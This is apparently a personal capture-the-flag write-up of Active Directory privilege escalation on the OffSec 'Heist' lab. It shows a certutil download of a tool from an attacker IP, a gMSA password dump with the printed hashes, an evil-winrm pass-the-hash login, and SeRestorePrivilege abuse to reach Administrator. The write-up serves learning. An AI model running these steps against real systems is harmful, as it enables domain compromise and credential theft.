# Priv Escalation This is some big brain shit I had to look at a walktrough because I woudl've never figured this out. So basically upon graphing the data using hte pre-compiled binary from BloodHound. ![](https://1831357707-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8orEMrbW2JUz78N6Vl5G%2Fuploads%2F2S1cyKu76gg1ntBDceka%2F2022-07-15_11-18.png?alt=media\&token=c86d3373-a1b7-4f91-90f4-cf5ab236def5) You notice that the user svc\_apache can read gMSA passwords. "SVC\_APACHE$@HEIST.OFFSEC is a Group Managed Service Account. The group WEB can retrieve the password for the GMSA SVC\_APACHE$@HEIST.OFFSEC." So Web Admins can also retrieve GMSA passwords. We see that with the output of "Get-ADGroupMember 'Web Admin". That the user enox is also part of the web admins. Thats us! ![](https://1831357707-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8orEMrbW2JUz78N6Vl5G%2Fuploads%2FrJleQnfj5DoDyLpP7yUF%2F2022-07-15_11-50.png?alt=media\&token=7804dc19-d4af-46c2-be37-cb59bf0b3b05) So that means that we can also read passwords like that user. Using GMSAPasswordReader.exe --accountname 'svc\_apache' We are able to read the rc4 hash, which is just a hash that we can use to log in as that user. ``` *Evil-WinRM* PS C:\Users\enox> Get-ADServiceAccount -Filter {name -eq 'svc_apache'} -Properties * | Select CN,DNSHostName,DistinguishedName,MemberOf,Created,LastLogonDate,PasswordLastSet,msDS-ManagedPasswordInterval,PrincipalsAllowedToDelegateToAccount,PrincipalsAllowedToRetrieveManagedPassword,ServicePrincipalNames CN : svc_apache DNSHostName : DC01.heist.offsec DistinguishedName : CN=svc_apache,CN=Managed Service Accounts,DC=heist,DC=offsec MemberOf : {CN=Remote Management Users,CN=Builtin,DC=heist,DC=offsec} Created : 7/20/2021 4:23:44 AM LastLogonDate : 9/14/2021 8:27:06 AM PasswordLastSet : 7/20/2021 4:23:44 AM msDS-ManagedPasswordInterval : 30 PrincipalsAllowedToDelegateToAccount : {} PrincipalsAllowedToRetrieveManagedPassword : {CN=DC01,OU=Domain Controllers,DC=heist,DC=offsec, CN=Web Admins,CN=Users,DC=heist,DC=offsec} ServicePrincipalNames : *Evil-WinRM* PS C:\Users\enox> Get-ADGroupMember 'Web Admins' distinguishedName : CN=Naqi,CN=Users,DC=heist,DC=offsec name : Naqi objectClass : user objectGUID : 82c847e5-1db7-4c00-8b06-882efb4efc6f SamAccountName : enox SID : S-1-5-21-537427935-490066102-1511301751-1103 *Evil-WinRM* PS C:\Users\enox> certutil -urlcache -f http://192.168.49.105:443/GMSAPasswordReader.exe GMSAPasswordReader.exe **** Online **** CertUtil: -URLCache command completed successfully. *Evil-WinRM* PS C:\Users\enox> . ./GMSAPasswordReader.exe --accountname 'svc_apache' Calculating hashes for Old Value [*] Input username : svc_apache$ [*] Input domain : HEIST.OFFSEC [*] Salt : HEIST.OFFSECsvc_apache$ [*] rc4_hmac : 1808D2C09D9E6A0EDC419A4B13868C92 [*] aes128_cts_hmac_sha1 : 8146F49C50041D6F8F70D45D9F26AF27 [*] aes256_cts_hmac_sha1 : 810B1963081C261DBDA3E91618943A59EA0A9B6DD48BAFA5E30098D0F7412707 [*] des_cbc_md5 : B6E961D04679DA29 Calculating hashes for Current Value [*] Input username : svc_apache$ [*] Input domain : HEIST.OFFSEC [*] Salt : HEIST.OFFSECsvc_apache$ [*] rc4_hmac : 45EA837EDB477DDA17B5822AD768D0D7 [*] aes128_cts_hmac_sha1 : 9F234A0EEC90B6AF9FC395D85CE938D5 [*] aes256_cts_hmac_sha1 : 90321B028FB63CD44F37BA7F6829F5CBE4DAA1EE926A909EA9CFC607B52A0CA4 [*] des_cbc_md5 : B0750E611F7FA14F ``` The rc4hmac is ntlm hash. ``` evil-winrm -i 192.168.105.165 -u svc_apache$ -H 45EA837EDB477DDA17B5822AD768D0D7 Evil-WinRM shell v3.4 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc_apache$\Documents> ``` Basically GMas password can be read by remote users, because the svc*apache user was part of web admins and so was enox we had the same rights as svc*apache so we read his password using the GMASpasswordreader.exe --accountname 'svc-apache'. We then used the following line to get a shell as apache ``` Evil-WinRM* PS C:\Users\svc_apache$\Documents> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeRestorePrivilege Restore files and directories Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled ``` As apache user we have teh seRestorePrivilege. We can exploit this. First we clone the github repo into Visual Studio Code in our Windows Client. {% embed url="" %} Afterwards, I transferred the binary SeRestoreAbuse.exe to the machine and with nc.exe. ![](https://1831357707-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8orEMrbW2JUz78N6Vl5G%2Fuploads%2Fki2s7TUsfPHvbLsa9iam%2F2022-07-15_13-06.png?alt=media\&token=59365c49-d19e-44ac-a58e-751df7975e5e) And bam, we got Administrator access.